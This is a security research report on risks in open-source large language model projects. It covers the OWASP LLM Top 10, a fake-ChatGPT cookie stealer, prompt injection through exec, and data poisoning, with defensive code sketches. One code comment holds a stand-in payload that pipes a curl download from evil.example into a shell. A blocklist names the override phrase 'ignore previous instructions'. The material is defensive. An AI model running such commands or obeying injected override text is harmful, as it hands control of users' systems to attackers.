ExplAIning the Risk: Exploring the Large Language Models Open-Source Security Landscape
Rezilion Research
BY YOTAM PERKAL AND KATYA DONCHENKO
Introduction
GENERATIVE ARTIFICIAL INTELLIGENCE (AI) HAS EXPERIENCED A REMARKABLE RISE IN RECENT YEARS,
revolutionizing how we create, interact with, and consume digital content. With the advent of Large
Language Models (LLMs) like GPT (Generative Pre-Trained Transformer), the capabilities of Generative AI
have reached unprecedented levels, enabling machines to generate human-like text, images, and even
code. However, as with any transformative technology, the adoption of Generative AI also brings forth a
set of challenges, particularly in the realm of security. In this research, we will delve into the emergence of
Generative AI, addressing not only the security concerns related to Large Language Models (LLMs) but also
the broader security considerations accompanying the adoption of any new technology.
Generative AI models are making their way to more and more industries, including healthcare, finance,
transportation, entertainment, real estate, education, and even cybersecurity. They are becoming
integral to search engines, voice assistants, social networks, and more. It seems that every day a different
company announces a new Generative AI-based capability.
In the rush to quickly go to market, is enough focus being put on the security aspects of this new
technology? Are proper risk assessments being conducted? Are the inherent shortcomings of these
models taken into account? Are proper security controls put in place to prevent their abuse? As we will show
through our research on this topic, the unfortunate answer to these questions is that not enough is being
done to address the security risks inherent to these technologies.
Attackers are already starting to take notice and exploit the surging popularity of these Generative
AI-based models to their advantage. In one recent example, a fake GPT project revealed by the
SonicWall Capture Labs research team claimed to provide a better AI tool than ChatGPT. Upon installation,
the project opens the Chrome browser with the real OpenAI website, leading the victim to believe that
the real ChatGPT was installed. Silently, however, it executes a batch file named gpt4.bat, which in turn loads a
malicious browser extension named “dmkamcknogkgcdfhhbddcghachkejeapgpt4” containing obfuscated
JavaScript code whose primary function is to steal Facebook cookies.
On one hand, AI introduces new threat vectors that did not exist before, which now require attention and
awareness. On the other hand, some of the risks stemming from using these AI systems are not new; they
are the same security risks that we already know, yet often do not give enough attention to when it comes
to using AI systems. More on that below.
Security risks in Machine Learning/AI systems can affect all aspects of the CIA triad. For example:
Confidentiality — Leakage of secrets, private training data, and more
Integrity — Adversarial attacks could be used to evade detection or manipulate the model output
Availability — Adversaries could craft specific input designed to exhaust or maximize compute or inference cost
This research focuses on the risks relating to Large Language Models in particular, as well as their broader
open-source ecosystem.
Generative AI is surging in popularity — and making headlines in recent months.
Security Risks in LLM Projects
OWASP RECENTLY RELEASED A DRAFT OF THE OWASP TOP 10 SECURITY RISKS LIST for Large Language Model
Applications. With this resource, we can better understand the important vulnerability types for Artificial
Intelligence (AI) applications built on Large Language Models (LLMs).

LLM01:2023 — Prompt Injections (Trust Boundary Risk / Inherent Model Risk): Bypassing filters or manipulating the LLM using carefully crafted prompts that make the model ignore previous instructions or perform unintended actions.
LLM02:2023 — Data Leakage (Data Management Risk): Accidentally revealing sensitive information, proprietary algorithms, or other confidential details through the LLM’s responses.
LLM03:2023 — Inadequate Sandboxing (Trust Boundary Risk): Failing to properly isolate LLMs when they have access to external resources or sensitive systems, allowing for potential exploitation and unauthorized access.
LLM04:2023 — Unauthorized Code Execution (Trust Boundary Risk): Exploiting LLMs to execute malicious code, commands, or actions on the underlying system through natural language prompts.
LLM05:2023 — SSRF Vulnerabilities (Trust Boundary Risk): Exploiting LLMs to perform unintended requests or access restricted resources, such as internal services, APIs, or data stores.
LLM06:2023 — Overreliance on LLM-generated Content (Inherent Model Risk): Excessive dependence on LLM-generated content without human oversight can result in harmful consequences.
LLM07:2023 — Inadequate AI Alignment (Inherent Model Risk): Failing to ensure that the LLM’s objectives and behavior align with the intended use case, leading to undesired consequences or vulnerabilities.
LLM08:2023 — Insufficient Access Controls (Trust Boundary Risk / Basic Security Best Practice): Not properly implementing access controls or authentication, allowing unauthorized users to interact with the LLM and potentially exploit vulnerabilities.
LLM09:2023 — Improper Error Handling (Basic Security Best Practice): Exposing error messages or debugging information that could reveal sensitive information, system details, or potential attack vectors.
LLM10:2023 — Training Data Poisoning (Data Management Risk): Maliciously manipulating training data or fine-tuning procedures to introduce vulnerabilities or backdoors into the LLM.
Generally speaking, while there is some overlap, we can divide the risks into several groups:
Trust Boundary Risk
Data Management Risk
Inherent Model Risk
Basic Security Best Practice
Let’s explore each group of risks:
Trust Boundary Risk
Risks such as inadequate sandboxing, unauthorized code execution, SSRF vulnerabilities, insufficient access
controls, and even prompt injections, in a sense, all fall under the general concept of trust boundaries.
Trust boundaries help us establish zones of trust where we have confidence in the security and reliability
of the components and data within them. Beyond these boundaries, there is a level of uncertainty and
potential risk. By defining trust boundaries, we can implement appropriate security measures and controls
to protect our sensitive information and ensure that only authorized access and interactions occur within
trusted areas. Trust boundaries are virtual fences that help us maintain a secure environment and protect
our digital assets from potential threats.
HOW DOES IT MANIFEST?
In the context of LLMs, trust boundary risks are especially significant as users enable LLMs to utilize external
resources such as databases, search interfaces, or external computing tools, which can greatly enhance
their functionalities. Nonetheless, the inherent unpredictability of LLM completion outputs necessitates
cautious integration to prevent potential manipulation by malicious actors. Failure to address this concern
adequately can significantly elevate the risks associated with these models.
For the purposes of this analysis, we have included prompt injection under the trust boundary risks category
because once plugins are being used (meaning the Large Language Model now has the ability to call one
or more different APIs), prompt injections can be used to cross trust boundaries.
Recognizing that attackers can extract or manipulate any information provided in the prompt is crucial.
Merely protecting LLM models at the prompt level is inadequate, as the root issue lies in the incorrect
establishment of trust boundaries. It’s important to understand that anyone who can input text into the LLM,
including users, accessed websites, and LLM plugins, can influence its output.
This emphasizes the necessity of addressing trust boundaries, threat models, and authorization concerns
instead of treating them as complex AI problems. By acknowledging the potential manipulation of LLMs and
applying appropriate trust to their output, we can approach their integration more effectively and mitigate
potential risks.
There have already been examples of such issues in the wild. For example, CVE-2023-29374, a vulnerability
in LangChain (the third most-popular open-source GPT-based project at this time), made it susceptible to
prompt injection attacks that can execute arbitrary code via the Python exec method.
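To make the pattern concrete, below is a minimal sketch, not LangChain's actual code: the real vulnerability passed model output to Python's exec, while this simplified example evaluates an arithmetic expression and contrasts the unsafe pattern with a variant that only accepts a restricted grammar. The function names, stubbed completion, and prompt are assumptions for illustration.

# A minimal sketch (not LangChain's implementation) of the pattern behind
# CVE-2023-29374-style issues: model-generated text is executed on the host,
# so anyone who can influence the prompt can influence what runs.

import ast

def ask_llm(prompt: str) -> str:
    # Stand-in for a real LLM call. Imagine an attacker-influenced prompt causing it
    # to return something like "__import__('os').system('curl https://evil.example | sh')".
    return "2 ** 10"

def eval_unsafe(user_question: str) -> object:
    completion = ask_llm(f"Write a Python expression that computes: {user_question}")
    # DANGEROUS: the trust boundary is crossed here; untrusted model output runs on the host.
    return eval(completion)

def eval_safer(user_question: str) -> object:
    completion = ask_llm(f"Write a Python expression that computes: {user_question}")
    # One mitigation: parse the output and only accept a restricted grammar
    # (literals and basic arithmetic), rejecting everything else.
    tree = ast.parse(completion, mode="eval")
    allowed = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
               ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Pow, ast.USub)
    if not all(isinstance(node, allowed) for node in ast.walk(tree)):
        raise ValueError("Model output contains disallowed constructs")
    return eval(compile(tree, "<llm-output>", "eval"))

if __name__ == "__main__":
    print(eval_safer("two to the tenth power"))  # 1024 with the stubbed completion

Even the safer variant only narrows the blast radius; the broader fix, as discussed below, is to treat all model output as untrusted input and to sandbox whatever consumes it.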
HOW CAN THE RISK BE MITIGATED?
Just as security guardrails have been developed around common risks in the software
development domain, AI models and their encompassing ecosystem must develop the same
compensating controls and best practices.
For example, to prevent SQL injections, we have learned as an industry to apply strategies such as input
validation and sanitization; the same techniques must be adapted to address prompt injection risk.
For example, if possible, refrain from allowing free-form text input to be fed directly to the LLM; instead,
opt for a standard set of options (a dropdown list, for example) from which the user can choose how
to interact with the model.
If free-form input is required, implement strict input validation and sanitization of user-provided prompts. Be
sure to constantly update and fine-tune the LLM to improve its understanding of malicious inputs and edge
cases, and monitor and log all LLM interactions to detect and analyze potential prompt injection attempts.
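As one illustration of that advice, here is a minimal sketch of validating, sanitizing, and logging prompts before they reach the model; the blocklist patterns, length limit, and logger name are assumptions for the example rather than recommended values.

# Sketch of prompt validation, sanitization, and logging in front of an LLM.
# The patterns and limits are illustrative only and are easy to bypass on their own.

import logging
import re

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("llm-gateway")

MAX_PROMPT_LENGTH = 2000
SUSPICIOUS_PATTERNS = [
    re.compile(r"ignore (all )?(previous|prior) instructions", re.IGNORECASE),
    re.compile(r"\b(exec|eval|__import__|os\.system)\b"),
]

def validate_prompt(prompt: str) -> str:
    """Return a sanitized prompt, or raise ValueError if it looks like an injection attempt."""
    if len(prompt) > MAX_PROMPT_LENGTH:
        raise ValueError("Prompt exceeds maximum allowed length")
    for pattern in SUSPICIOUS_PATTERNS:
        if pattern.search(prompt):
            log.warning("Possible prompt injection attempt blocked: %r", prompt[:200])
            raise ValueError("Prompt rejected by input validation")
    # Strip control characters that have no business in a user prompt.
    sanitized = re.sub(r"[\x00-\x08\x0b\x0c\x0e-\x1f]", "", prompt)
    log.info("Prompt accepted (%d chars)", len(sanitized))
    return sanitized

if __name__ == "__main__":
    print(validate_prompt("Summarize the attached report in three bullet points."))

Blocklists of this kind are trivially evaded by a determined attacker, which is exactly why the report pairs filtering with monitoring, sandboxing, and least-privilege access rather than relying on it alone.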
Additionally, it is imperative to enforce proper sandboxing and segregation by restricting the LLM’s access to
network resources, internal services, and APIs.
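One way to express that segregation in code, purely as an illustrative sketch with hypothetical tool names, is to route every model-initiated call through an explicit allowlist so the model can never reach services that were not deliberately exposed to it:

# Illustrative sketch: every outbound call requested by the LLM is checked against an
# explicit allowlist, so the model cannot reach arbitrary internal services or APIs.
# The tool names and stub handlers are hypothetical.

from typing import Callable, Dict

ALLOWED_TOOLS: Dict[str, Callable[[str], str]] = {
    # Only tools that have been explicitly reviewed are reachable from model output.
    "weather_lookup": lambda city: f"(stub) weather for {city}",
    "public_docs_search": lambda query: f"(stub) search results for {query}",
}

def dispatch_tool_call(tool_name: str, argument: str) -> str:
    handler = ALLOWED_TOOLS.get(tool_name)
    if handler is None:
        # Requests for anything outside the allowlist (internal APIs, metadata
        # endpoints, file systems) are refused rather than forwarded.
        raise PermissionError(f"Tool '{tool_name}' is not permitted for LLM use")
    return handler(argument)

if __name__ == "__main__":
    print(dispatch_tool_call("weather_lookup", "Tel Aviv"))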
Data Management Risk
Risks such as data leakage and training data poisoning fall under the data management risks category.
These risks are relevant to any machine learning system and are not unique to Large Language Models, yet
they should be addressed nonetheless.
HOW DOES IT MANIFEST?
Training data poisoning refers to the deliberate manipulation of an LLM’s training data or fine-tuning
procedures by an attacker to introduce vulnerabilities, backdoors, or biases that can undermine the
security, effectiveness, or ethical behavior of the model. This malicious act aims to compromise the integrity
and reliability of the LLM by injecting misleading or harmful information during the training process.
Data leakage refers to an LLM’s unintentional disclosure of sensitive information, proprietary algorithms, or
other confidential details in its responses. This inadvertent disclosure can lead to unauthorized access to
valuable data or intellectual property, compromising privacy and giving rise to various security breaches.
An additional concern related to the disclosure of private data is the potential for ChatGPT to reveal
personal information, leading to the dissemination of speculative or harmful content.
HOW CAN THE RISK BE MITIGATED?
Training data must be sourced from reliable and verified sources. Its integrity should also be verified by
conducting thorough quality validation as well as employing robust data sanitization and preprocessing
techniques to eliminate vulnerabilities and biases and ensure its reliability and fairness.
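A small sketch of that integrity check, assuming a hypothetical JSON manifest of trusted SHA-256 hashes, might look like this:

# Sketch of one integrity check for training data: each file is compared against a
# SHA-256 recorded in a trusted manifest before it is allowed into the training set.
# The manifest format and file paths are hypothetical.

import hashlib
import json
from pathlib import Path

def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_dataset(manifest_path: Path) -> list[Path]:
    """Return the files that match the manifest; raise if any file was tampered with."""
    manifest = json.loads(manifest_path.read_text())  # e.g. {"data/part-0001.jsonl": "<sha256>", ...}
    verified = []
    for relative_path, expected_hash in manifest.items():
        file_path = manifest_path.parent / relative_path
        if sha256_of(file_path) != expected_hash:
            raise RuntimeError(f"Integrity check failed for {relative_path}")
        verified.append(file_path)
    return verified

Hash verification only proves the data has not changed since the manifest was produced; vetting the sources behind the manifest remains a separate, human task.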
Strict output filtering and context-aware mechanisms to safeguard against the inadvertent disclosure of
sensitive information by the LLM should be employed to address data leakage risks.
Differential privacy techniques or other data anonymization methods could also be applied during the LLM’s
training to mitigate the risks of overfitting and memorization. It is advised to conduct regular audits and
reviews of the LLM’s responses to identify and proactively prevent any unintended disclosure of sensitive
information. Additionally, comprehensive monitoring and logging practices should be used to detect and
analyze potential data leakage incidents arising from LLM interactions.
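As a deliberately simplistic illustration of output filtering, the sketch below redacts a few common sensitive patterns from an LLM response before it is returned to the user; the regular expressions are assumptions for the example, and a production system would combine them with context-aware classifiers and policy checks.

# Simplistic sketch of output filtering for data leakage: LLM responses are scanned
# for a few sensitive patterns (emails, API-key-like strings, card-like numbers) and
# redacted before being returned. The patterns are illustrative, not exhaustive.

import re

REDACTION_RULES = [
    (re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"), "[REDACTED EMAIL]"),
    (re.compile(r"\bsk-[A-Za-z0-9]{20,}\b"), "[REDACTED API KEY]"),
    (re.compile(r"\b(?:\d[ -]?){13,16}\b"), "[REDACTED NUMBER]"),
]

def filter_llm_output(response: str) -> str:
    """Return the response with obviously sensitive substrings redacted."""
    filtered = response
    for pattern, replacement in REDACTION_RULES:
        filtered = pattern.sub(replacement, filtered)
    return filtered

if __name__ == "__main__":
    print(filter_llm_output("Contact me at alice@example.com, my key is sk-ABCDEF1234567890abcdef"))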